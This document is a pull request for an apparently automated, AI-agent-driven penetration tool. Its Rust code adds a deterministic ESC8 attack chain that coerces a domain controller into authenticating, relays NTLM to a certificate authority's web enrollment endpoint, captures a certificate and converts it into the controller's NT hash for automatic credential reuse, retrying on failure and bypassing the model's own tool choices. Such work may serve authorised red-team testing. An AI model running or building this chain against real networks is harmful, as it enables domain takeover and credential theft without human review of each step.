### PR TITLE
feat: add deterministic ESC8 NTLM relay exploitation chain

### DIFF
--- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
@@ -269,6 +269,21 @@ pub async fn auto_adcs_exploitation(
                 continue;
             }
 
+            // ESC8 (NTLM relay to /certsrv) was LLM-routed and in practice
+            // failed two ways: (a) LLM picked tool order wrong / forgot
+            // certipy_auth on the captured .pfx; (b) ntlmrelayx port-445
+            // collisions surfaced as opaque "RELAY_BIND_FAILED" the agent
+            // could not action. The `relay_and_coerce` composite tool +
+            // Tier 9's port-free check + certipy_auth on the PFX path the
+            // tool prints under `PFX_FILE=` lets us drive the full chain
+            // deterministically. Same dedup/retry lifecycle as ESC1/ESC3.
+            if item.esc_type == "esc8" {
+                if dispatch_esc8_deterministic(&dispatcher, &item).await {
+                    // Spawn manages its own dedup-clear-on-failure.
+                }
+                continue;
+            }
+
             let role = role_for_esc_type(&item.esc_type);
 
             // Coercion-based ESC paths (ESC8, ESC11) need a relay listener and
@@ -750,6 +765,296 @@ async fn dispatch_esc1_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
             .await;
     });
     true
+}
+
+/// ESC8 = NTLM relay from a coerced DC to the CA's web enrollment endpoint.
+/// The full chain is:
+///   1. `relay_and_coerce` listens on `attacker_ip:445`, coerces the chosen
+///      DC via PetitPotam / PrinterBug / DFSCoerce, and relays the captured
+///      NTLM auth to `http://<ca_host>/certsrv/certfnsh.asp`. On success
+///      ntlmrelayx writes a PKCS#12 to disk and the tool surfaces
+///      `PFX_FILE=<path>` + `RELAYED_USER=<dc_machine_account>` markers.
+///   2. `certipy_auth` consumes the PFX → returns the NT hash of the
+///      relayed machine account (`<dc>$`).
+///   3. mark_exploited on the ADCS ESC8 vuln_id.
+///
+/// The vuln stays dedup-locked on success and on attempt-cap exhaustion;
+/// transient failures (RELAY_BIND_BUSY, RELAY_BIND_FAILED, missing pfx)
+/// clear dedup so the next tick can retry — that's how the chain rides out
+/// a brief listener race or a coerce target the LLM-collected list pointed
+/// at the wrong host.
+async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsExploitWork) -> bool {
+    if dispatcher.state.is_exploit_abandoned(&item.vuln_id).await {
+        info!(
+            vuln_id = %item.vuln_id,
+            "ESC8 chain skipped — vuln abandoned (>=MAX_EXPLOIT_FAILURES); locking dedup"
+        );
+        let mut state = dispatcher.state.write().await;
+        state.mark_processed(DEDUP_ADCS_EXPLOIT, item.dedup_key.clone());
+        let _ = dispatcher
+            .state
+            .persist_dedup(&dispatcher.queue, DEDUP_ADCS_EXPLOIT, &item.dedup_key)
+            .await;
+        return false;
+    }
+
+    let Some(ca_host) = item.ca_host.clone() else {
+        debug!(vuln_id = %item.vuln_id, "ESC8 chain skipped — CA host unknown");
+        return false;
+    };
+    let Some(attacker_ip) = dispatcher.config.listener_ip.clone() else {
+        debug!(
+            vuln_id = %item.vuln_id,
+            "ESC8 chain skipped — listener_ip not configured; relay has nowhere to bind"
+        );
+        return false;
+    };
+    // Pick the first non-CA candidate. The `pick_coerce_targets` helper
+    // already orders DCs first then other domain-joined hosts; coercing the
+    // CA itself is rejected at the tool layer (NTLM loopback protection),
+    // and pick_coerce_targets explicitly excludes it.
+    let coerce_target = match item.coerce_candidates.first().cloned() {
+        Some(t) => t,
+        None => {
+            debug!(
+                vuln_id = %item.vuln_id,
+                "ESC8 chain skipped — no coerce candidate available (need a DC other than the CA host)"
+            );
+            return false;
+        }
+    };
+    let Some(cred) = item.credential.clone() else {
+        debug!(vuln_id = %item.vuln_id, "ESC8 chain skipped — no credential");
+        return false;
+    };
+
+    // Mark dedup BEFORE spawning so the next 5s exploitation tick doesn't
+    // re-dispatch while the (long-running) relay is in flight.
+    {
+        let mut state = dispatcher.state.write().await;
+        state.mark_processed(DEDUP_ADCS_EXPLOIT, item.dedup_key.clone());
+    }
+    let _ = dispatcher
+        .state
+        .persist_dedup(&dispatcher.queue, DEDUP_ADCS_EXPLOIT, &item.dedup_key)
+        .await;
+
+    let template = item
+        .template_name
+        .clone()
+        .unwrap_or_else(|| "DomainController".to_string());
+    let relay_args = serde_json::json!({
+        "ca_host": ca_host,
+        "coerce_target": coerce_target,
+        "attacker_ip": attacker_ip,
+        "template": template,
+        // Authenticated coercion: pass the cred so PetitPotam / DFSCoerce
+        // can fire even on patched-unauth DCs.
+        "coerce_user": cred.username,
+        "coerce_password": cred.password,
+        "coerce_domain": cred.domain,
+    });
+
+    let relay_task_id = format!(
+        "esc8_chain_{}",
+        &uuid::Uuid::new_v4().simple().to_string()[..12]
+    );
+    let relay_call = ares_llm::ToolCall {
+        id: format!("relay_and_coerce_{}", uuid::Uuid::new_v4().simple()),
+        name: "relay_and_coerce".to_string(),
+        arguments: relay_args,
+    };
+
+    info!(
+        task_id = %relay_task_id,
+        vuln_id = %item.vuln_id,
+        ca_host = %ca_host,
+        coerce_target = %coerce_target,
+        attacker_ip = %attacker_ip,
+        "ESC8 chain dispatched (direct tool, no LLM): relay+coerce phase"
+    );
+
+    let dispatcher_bg = dispatcher.clone();
+    let vuln_id_bg = item.vuln_id.clone();
+    let dedup_key_bg = item.dedup_key.clone();
+    let domain_bg = item.domain.clone();
+    let ca_host_bg = ca_host;
+    tokio::spawn(async move {
+        let relay_result = dispatcher_bg
+            .llm_runner
+            .tool_dispatcher()
+            .dispatch_tool("coercion", &relay_task_id, &relay_call)
+            .await;
+        let relay_output = match relay_result {
+            Ok(r) => r,
+            Err(e) => {
+                warn!(
+                    vuln_id = %vuln_id_bg,
+                    err = %e,
+                    "ESC8 chain: relay_and_coerce dispatch errored — clearing dedup for retry"
+                );
+                esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+                return;
+            }
+        };
+
+        // The composite tool always returns Ok even on relay failures —
+        // success is signalled by `PFX_FILE=<path>` appearing in stdout.
+        // Parse that marker; if absent, the chain didn't capture a cert.
+        let pfx_path = relay_output
+            .output
+            .lines()
+            .find_map(|line| line.trim().strip_prefix("PFX_FILE="))
+            .map(str::trim)
+            .filter(|p| !p.is_empty())
+            .map(str::to_string);
+        let relayed_user = relay_output
+            .output
+            .lines()
+            .find_map(|line| line.trim().strip_prefix("RELAYED_USER="))
+            .map(str::trim)
+            .filter(|u| !u.is_empty())
+            .map(str::to_string);
+
+        let Some(pfx_path) = pfx_path else {
+            let summary_tail: String = relay_output
+                .output
+                .lines()
+                .rev()
+                .take(6)
+                .collect::<Vec<_>>()
+                .into_iter()
+                .rev()
+                .collect::<Vec<_>>()
+                .join(" | ");
+            warn!(
+                vuln_id = %vuln_id_bg,
+                task_id = %relay_task_id,
+                output_tail = %summary_tail,
+                "ESC8 chain: relay_and_coerce returned without PFX_FILE — counting as failure"
+            );
+            let _ = dispatcher_bg
+                .state
+                .record_exploit_failure(&vuln_id_bg)
+                .await;
+            if !dispatcher_bg.state.is_exploit_abandoned(&vuln_id_bg).await {
+                esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+            }
+            return;
+        };
+
+        info!(
+            vuln_id = %vuln_id_bg,
+            pfx = %pfx_path,
+            relayed = ?relayed_user,
+            "ESC8 chain: cert captured; authenticating with certipy_auth"
+        );
+
+        // Phase 2: certipy auth -pfx <path> -> NT hash for the relayed user.
+        // The auth produces a Hash discovery via the certipy_auth parser.
+        let mut auth_args = serde_json::json!({ "pfx": pfx_path });
+        if let Some(ref u) = relayed_user {
+            // Strip trailing `$` (impacket's relay output ends machine
+            // account names with `$`); certipy_auth wants the bare SAM name.
+            auth_args["username"] = serde_json::Value::String(u.trim_end_matches('$').to_string());
+        }
+        if !domain_bg.is_empty() {
+            auth_args["domain"] = serde_json::Value::String(domain_bg.clone());
+        }
+        if !ca_host_bg.is_empty() {
+            // certipy_auth uses dc-ip for the KDC lookup; the CA host is
+            // also a viable target since ESC8's coerced victim is a DC and
+            // its KDC sits on the same host. Caller can override via
+            // payload if a separate dc_ip is known.
+            auth_args["dc_ip"] = serde_json::Value::String(ca_host_bg.clone());
+        }
+
+        let auth_call = ares_llm::ToolCall {
+            id: format!("certipy_auth_{}", uuid::Uuid::new_v4().simple()),
+            name: "certipy_auth".to_string(),
+            arguments: auth_args,
+        };
+        let auth_task_id = format!(
+            "esc8_auth_{}",
+            &uuid::Uuid::new_v4().simple().to_string()[..12]
+        );
+        let auth_result = dispatcher_bg
+            .llm_runner
+            .tool_dispatcher()
+            .dispatch_tool("privesc", &auth_task_id, &auth_call)
+            .await;
+
+        let captured_hash = match auth_result {
+            Ok(r) => r
+                .discoveries
+                .as_ref()
+                .and_then(|d| d.get("hashes"))
+                .and_then(|h| h.as_array())
+                .map(|a| !a.is_empty())
+                .unwrap_or(false),
+            Err(_) => false,
+        };
+
+        if captured_hash {
+            // Same scoreboard-credit gap as ESC1/ESC3 — the deterministic
+            // chain bypasses the `exploit_*` task_id gate in
+            // result_processing, so we mark explicitly here.
+            if let Err(e) = dispatcher_bg
+                .state
+                .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg)
+                .await
+            {
+                warn!(
+                    err = %e,
+                    vuln_id = %vuln_id_bg,
+                    "Failed to mark ESC8 exploited (chain succeeded but token not emitted)"
+                );
+            }
+            info!(
+                vuln_id = %vuln_id_bg,
+                "ESC8 chain succeeded — NTLM hash published; auto_credential_reuse will fan out from here"
+            );
+            return;
+        }
+
+        // certipy_auth didn't produce a hash. Record failure; if not yet at
+        // the attempt cap, clear dedup for retry. The .pfx is left on disk
+        // — operators can re-auth manually if the issue is transient.
+        let attempts = dispatcher_bg
+            .state
+            .record_exploit_failure(&vuln_id_bg)
+            .await;
+        let abandoned = dispatcher_bg.state.is_exploit_abandoned(&vuln_id_bg).await;
+        if abandoned {
+            warn!(
+                vuln_id = %vuln_id_bg,
+                attempts,
+                "ESC8 chain abandoned — exhausted MAX_EXPLOIT_FAILURES; dedup stays locked"
+            );
+            return;
+        }
+        warn!(
+            vuln_id = %vuln_id_bg,
+            attempts,
+            "ESC8 chain: cert captured but certipy_auth failed to produce hash — clearing dedup for retry"
+        );
+        esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+    });
+    true
+}
+
+/// Shared dedup-clear path for ESC8 retry. Mirrors the inline pattern from
+/// `dispatch_esc1_deterministic` / `dispatch_esc3_deterministic`, hoisted
+/// here so the multi-arm error handling in the ESC8 spawn stays readable.
+async fn esc8_clear_dedup(dispatcher: &Arc<Dispatcher>, dedup_key: &str, _vuln_id: &str) {
+    {
+        let mut state = dispatcher.state.write().await;
+        state.unmark_processed(DEDUP_ADCS_EXPLOIT, dedup_key);
+    }
+    let _ = dispatcher
+        .state
+        .unpersist_dedup(&dispatcher.queue, DEDUP_ADCS_EXPLOIT, dedup_key)
+        .await;
 }
 
 async fn dispatch_esc3_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsExploitWork) -> bool {


### PR DESCRIPTION
**Key Changes:**

- Implemented a dedicated, deterministic exploitation chain for ADCS ESC8 via NTLM relay
- Improved reliability of ESC8 exploitation by avoiding LLM tool selection and port contention issues
- Automated the full relay, certificate capture, and credential extraction process
- Added robust deduplication and retry logic for transient failures

**Added:**

- Deterministic ESC8 exploitation function - Introduced `dispatch_esc8_deterministic` to manage the full relay and credential extraction chain for ESC8, including handling of tool dispatch, result parsing, and state management
- Dedicated deduplication clearing helper - Added `esc8_clear_dedup` to handle retry logic for ESC8-specific error paths
- Automated workflow for NTLM relay, PFX extraction, and credential reuse, including direct orchestration of `relay_and_coerce` and `certipy_auth` tools

**Changed:**

- ADCS exploitation workflow - Updated `auto_adcs_exploitation` to route ESC8 items to the new deterministic chain, bypassing the legacy LLM-driven tool invocation for this path and improving reliability in real-world relay/coercion scenarios